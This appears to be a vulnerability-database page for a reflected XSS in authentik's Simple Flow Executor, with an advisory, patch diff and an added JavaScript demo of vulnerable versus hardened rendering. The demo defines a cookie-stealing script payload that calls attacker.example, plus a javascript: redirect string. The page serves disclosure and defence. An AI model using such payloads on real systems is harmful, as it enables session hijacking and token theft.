VYPR
Critical severity (9.3) · NVD Advisory · Published Jun 2, 2026

CVE-2026-42849

Description

Reflected XSS in authentik's Simple Flow Executor allows session hijacking or token theft.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Prior to versions 2025.12.5 and 2026.2.3, authentik's Simple Flow Executor (SFE), the lightweight flow interface kept for compatibility with legacy browsers, contained a reflected cross-site scripting (XSS) vulnerability in its AutosubmitStage. Unlike authentik's other interfaces, the SFE rendered values with jQuery without explicit sanitization, so attacker-controlled input reached the page unescaped [1].

Exploitation

The issue is reachable when an OAuth2 provider is configured. An attacker crafts a request whose redirect_uri (accepted when the provider's allowed redirect URI pattern is a very broad regex) or state value carries script content; the SFE's AutosubmitStage reflects that value into the page without escaping, and the script runs in the victim's browser on the authentik origin [1].
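To make the reflection concrete, the following is an added JavaScript illustration written for this page; it is not authentik's code and does not reproduce the SFE's actual markup or its jQuery usage. It models a hypothetical autosubmit stage as a self-submitting form that posts the OAuth2 response (code, state) back to redirect_uri, shows the string-building pattern that lets a state value break out of an attribute, the escaped version beside it, and why an unanchored "broad" redirect URI regex admits attacker-controlled URLs (including a javascript: scheme) while a fully anchored one does not. The hostnames, regexes, code and state values are constructed for the example.

```javascript
// Added example for this page: a hypothetical stand-in, not authentik's SFE code.
// Models an "autosubmit" stage: a page that renders a hidden form carrying the
// OAuth2 response (code, state) and submits it to the client's redirect_uri.

// Escape a value for use in HTML text or inside a double-quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable shape: untrusted values concatenated straight into markup, so a
// state value containing '">' closes the attribute and the rest is parsed as HTML.
function renderAutosubmitVulnerable(redirectUri, fields) {
  let inputs = "";
  for (const [name, value] of Object.entries(fields)) {
    inputs += `<input type="hidden" name="${name}" value="${value}">`;
  }
  return `<form id="autosubmit" method="POST" action="${redirectUri}">${inputs}</form>` +
    `<script>document.getElementById("autosubmit").submit()</script>`;
}

// Hardened shape: the action URL must match a fully anchored allowlist pattern
// (escaping alone would not stop a javascript: action from running on submit),
// and every attacker-influenced value is attribute-escaped before it touches markup.
function renderAutosubmitHardened(redirectUri, fields, allowedRedirect) {
  if (!allowedRedirect.test(redirectUri)) {
    throw new Error("redirect_uri rejected by allowlist");
  }
  let inputs = "";
  for (const [name, value] of Object.entries(fields)) {
    inputs += `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
  }
  return `<form id="autosubmit" method="POST" action="${escapeHtml(redirectUri)}">${inputs}</form>` +
    `<script>document.getElementById("autosubmit").submit()</script>`;
}

// Number of <script> tags beyond the one legitimate autosubmit script.
function injectedScriptCount(html) {
  return (html.match(/<script>/g) || []).length - 1;
}

// Constructed attacker-controlled state value: closes the value attribute and
// injects a script that ships the cookie off to an attacker host.
const EVIL_STATE =
  '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// A "very broad" redirect URI pattern: unanchored, any host accepted.
const BROAD_REDIRECT = /https:\/\/.*/;
// A strict pattern: anchored, literal host and path.
const STRICT_REDIRECT = /^https:\/\/app\.example\.com\/oauth\/callback$/;

const LEGIT_REDIRECT = "https://app.example.com/oauth/callback";
const ATTACKER_REDIRECT = "https://attacker.example/collect";
// An unanchored pattern also matches a javascript: URL that merely contains a legit URL.
const JS_SCHEME_REDIRECT = "javascript:alert(1)//https://app.example.com/oauth/callback";

// Stand-alone demonstration; returns the observations rather than only printing them.
function demo() {
  const fields = { code: "SplxlOBeZQQYbYS6WxSbIA", state: EVIL_STATE };
  const vulnerable = renderAutosubmitVulnerable(LEGIT_REDIRECT, fields);
  const hardened = renderAutosubmitHardened(LEGIT_REDIRECT, fields, STRICT_REDIRECT);
  return {
    vulnerableInjected: injectedScriptCount(vulnerable),           // 1: attacker script survives
    hardenedInjected: injectedScriptCount(hardened),               // 0: state is rendered inert
    broadAllowsAttacker: BROAD_REDIRECT.test(ATTACKER_REDIRECT),   // true
    broadAllowsJsScheme: BROAD_REDIRECT.test(JS_SCHEME_REDIRECT),  // true
    strictAllowsAttacker: STRICT_REDIRECT.test(ATTACKER_REDIRECT), // false
    strictAllowsJsScheme: STRICT_REDIRECT.test(JS_SCHEME_REDIRECT),// false
  };
}

console.log(demo());
```

The two vectors from the advisory map onto the two checks: the state value is a pure output-encoding problem (any value must be escaped for the context it lands in), while redirect_uri is both an encoding problem and an allowlisting problem, since a broad regex lets the attacker choose where the form, and the code it carries, is sent.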

Impact

Successful exploitation lets an attacker redirect web requests that carry tokens, hijack the user's session, or perform other actions in the user's context. The scope depends on the context in which the SFE is used; authenticated user sessions are potentially affected [1].

Mitigation

This vulnerability is fixed in authentik versions 2025.12.5 and 2026.2.3; upgrade to one of these releases. The advisory specifies no workaround, and the issue is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog as of the advisory date [1]. Because one of the two vectors depends on a very broad redirect URI regex, reviewing OAuth2 providers for overly permissive redirect URI patterns reduces that exposure, but it does not address the state vector, so it is not a substitute for upgrading.

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 1

Commit b19f43c8e195

internal: Automated internal backport: CVE-2026-42849.sec.patch to authentik-main (#22303)

https://github.com/goauthentik/authentik · authentik-automation[bot] · May 12, 2026 · via github-commit-search
2 files changed · +28 -0
  • locale/en/dictionaries/people.txt+1 0 modified
    @@ -11,3 +11,4 @@ Naur
     Wärting
     Aadit
     Kilby
    +Kahmen
    
  • website/docs/security/cves/CVE-2026-42849.md+27 0 added
    @@ -0,0 +1,27 @@
    +# CVE-2026-42849
    +
    +_Reported by Jan Kahmen, [turingpoint GmbH](https://turingpoint.de/en/)_
    +
    +## Reflected XSS in SFE
    +
    +### Summary
    +
    +Due to the implementation of stages in the SFE (Simple Flow Executor) in order to make the interface more compatible with legacy browsers, it was possible to use an XSS exploit in the AutosubmitStage.
    +
    +### Patches
    +
    +authentik 2025.12.5 and 2026.2.3 fix this issue.
    +
    +### Impact
    +
    +The SFE (Simple Flow Executor) was susceptible to an XSS exploit. This could allow an attacker to redirect web requests containing tokens, hijack the session or take other malicious actions.
    +
    +This is possible when an OAuth2 provider is configured, either through the redirect_uri when a very broad regex is used, or through the state value.
    +
    +The SFE previously used jQuery without explicit sanitization, which, compared to the rest of our interfaces, did not sufficiently protect from malicious input values.
    +
    +### For more information
    +
    +If you have any questions or comments about this advisory:
    +
    +- Email us at [security@goauthentik.io](mailto:security@goauthentik.io).
    
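Review bot: The Summary in the new CVE-2026-42849.md attributes the bug to the SFE's legacy-browser design rather than to what actually enabled it; the root cause ("The SFE previously used jQuery without explicit sanitization") and the preconditions (an OAuth2 provider configured; the redirect_uri under a very broad regex, or the state value) appear only under Impact. Move or repeat them in Summary, for example "The SFE's AutosubmitStage rendered the redirect_uri and state values via jQuery without sanitization, allowing reflected XSS". The doc also has no Workarounds section: if tightening redirect URI regexes is considered a partial mitigation it should say so and note that the state vector is not covered by it; otherwise state explicitly that there is no workaround, so readers do not infer one from the regex remark.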

References: 1

News mentions: 0

No linked articles in our index yet.